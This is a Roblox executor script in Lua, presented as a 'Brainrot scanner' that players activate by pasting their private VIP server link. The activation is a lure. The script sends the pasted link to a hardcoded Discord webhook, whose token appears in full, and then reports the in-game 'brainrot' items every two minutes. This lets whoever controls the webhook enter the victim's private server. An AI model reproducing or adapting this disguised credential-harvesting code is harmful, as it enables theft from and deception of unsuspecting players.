local HttpService = game:GetService("HttpService")
local Workspace = game:GetService("Workspace")
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")

-- =============================
-- Конфиг
-- =============================
local WEBHOOK_URL = "https://discord.com/api/webhooks/1417846130619977738/mgmCuOeNpaNOBQddZUtCPaeheSjaBWdLNLfPPg2xk6-533OjiGgbjxwmkKPsQO7TK9ep" -- твой вебхук

-- =============================
-- Глобальные переменные
-- =============================
local isActivated = false
local activationGUI = nil
_G.VIP_LINK = nil

-- =============================
-- Утилиты (вернул как у тебя было)
-- =============================
local function tryExploitRequest(json)
	local req = (syn and syn.request) or (http and http.request) or (http_request) or (request)
	if typeof(req) == "function" then
		pcall(function()
			req({
				Url = WEBHOOK_URL,
				Method = "POST",
				Headers = { ["Content-Type"] = "application/json" },
				Body = json,
			})
		end)
		return true
	end
	return false
end

local function tryHttpServiceRequest(json)
	local ok, res = pcall(function()
		return HttpService:RequestAsync({
			Url = WEBHOOK_URL,
			Method = "POST",
			Headers = { ["Content-Type"] = "application/json" },
			Body = json,
		})
	end)
	return ok and res and res.Success
end

local function sendWebhook(payload)
	if WEBHOOK_URL == "" then return end
	local json = HttpService:JSONEncode(payload)
	if tryExploitRequest(json) then return end
	tryHttpServiceRequest(json)
end

local function postDiscordSimple(content)
	if WEBHOOK_URL == "" then return end
	local MAX = 1800
	local i = 1
	while i <= #content do
		local chunk = string.sub(content, i, math.min(i + MAX - 1, #content))
		sendWebhook({ content = "```\n" .. chunk .. "\n```" })
		i = i + MAX
	end
end

-- =============================
-- Детект брейнротов (оставил твой способ)
-- =============================
local function detectBrainrots()
	local brainrots = {}
	for _, obj in pairs(Workspace:GetChildren()) do
		if obj:IsA("Model") and obj:FindFirstChild("Humanoid") then
			if obj.Name:lower():find("brainrot") then
				table.insert(brainrots, obj)
			end
		end
	end
	return brainrots
end

local function postCombinedAllPlots()
	local brainrots = detectBrainrots()
	if #brainrots == 0 then return end

	local msg = "🧠 Brainrots detected: " .. #brainrots .. "\n"
	for _, b in ipairs(brainrots) do
		msg = msg .. "- " .. b.Name .. "\n"
	end

	postDiscordSimple(msg)
end

-- =============================
-- Мониторинг
-- =============================
local function watchPlots()
	task.spawn(function()
		while isActivated do
			postCombinedAllPlots()
			task.wait(120) -- каждые 2 минуты
		end
	end)
end

-- =============================
-- GUI (исправленный)
-- =============================
local function createActivationGUI()
	local player = Players.LocalPlayer
	local gui = Instance.new("ScreenGui")
	gui.Name = "BrainrotScannerActivation"
	gui.ResetOnSpawn = false
	gui.Parent = player:WaitForChild("PlayerGui")

	local mainFrame = Instance.new("Frame")
	mainFrame.Name = "MainFrame"
	mainFrame.Size = UDim2.new(0, 450, 0, 300)
	mainFrame.Position = UDim2.new(0.5, -225, 0.5, -150)
	mainFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	mainFrame.Parent = gui

	local title = Instance.new("TextLabel")
	title.Size = UDim2.new(1, -20, 0, 40)
	title.Position = UDim2.new(0, 10, 0, 10)
	title.BackgroundTransparency = 1
	title.Text = "Place VIP server link to activate script"
	title.TextColor3 = Color3.fromRGB(255, 255, 255)
	title.TextScaled = true
	title.Font = Enum.Font.GothamBold
	title.Parent = mainFrame

	local textBox = Instance.new("TextBox")
	textBox.Size = UDim2.new(1, -20, 0, 40)
	textBox.Position = UDim2.new(0, 10, 0, 60)
	textBox.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
	textBox.Text = ""
	textBox.PlaceholderText = "https://www.roblox.com/share?code=..."
	textBox.PlaceholderColor3 = Color3.fromRGB(180, 180, 180)
	textBox.TextColor3 = Color3.fromRGB(255, 255, 255)
	textBox.TextScaled = true
	textBox.Font = Enum.Font.Gotham
	textBox.ClearTextOnFocus = false
	textBox.Parent = mainFrame

	local button = Instance.new("TextButton")
	button.Size = UDim2.new(1, -20, 0, 60)
	button.Position = UDim2.new(0, 10, 0, 120)
	button.BackgroundColor3 = Color3.fromRGB(0, 120, 255)
	button.Text = "ACTIVATE"
	button.TextColor3 = Color3.fromRGB(255, 255, 255)
	button.Font = Enum.Font.GothamBold
	button.TextScaled = true
	button.Parent = mainFrame

	button.MouseEnter:Connect(function()
		TweenService:Create(button, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(0, 170, 255)}):Play()
	end)
	button.MouseLeave:Connect(function()
		TweenService:Create(button, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(0, 120, 255)}):Play()
	end)

	local status = Instance.new("TextLabel")
	status.Size = UDim2.new(1, -20, 0, 30)
	status.Position = UDim2.new(0, 10, 0, 200)
	status.BackgroundTransparency = 1
	status.Text = ""
	status.TextColor3 = Color3.fromRGB(255, 200, 0)
	status.TextScaled = true
	status.Font = Enum.Font.Gotham
	status.Parent = mainFrame

	local function onActivate()
		local vipLink = textBox.Text:gsub("^%s*(.-)%s*$", "%1")
		if vipLink == "" or not string.find(vipLink, "roblox%.com/share") then
			status.Text = "Not a VIP link"
			status.TextColor3 = Color3.fromRGB(255, 80, 80)
			return
		end

		isActivated = true
		_G.VIP_LINK = vipLink
		status.Text = "Script Activated, wait 2 minutes"
		status.TextColor3 = Color3.fromRGB(0, 255, 100)

		postDiscordSimple("🔗 VIP Link: " .. vipLink)

		task.wait(1)
		postCombinedAllPlots()
		watchPlots()

		task.wait(2)
		gui:Destroy()
		activationGUI = nil
	end

	button.MouseButton1Click:Connect(onActivate)
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then onActivate() end
	end)
end

-- =============================
-- Старт
-- =============================
print("[BrainrotScanner] Создаю GUI активации...")
createActivationGUI()
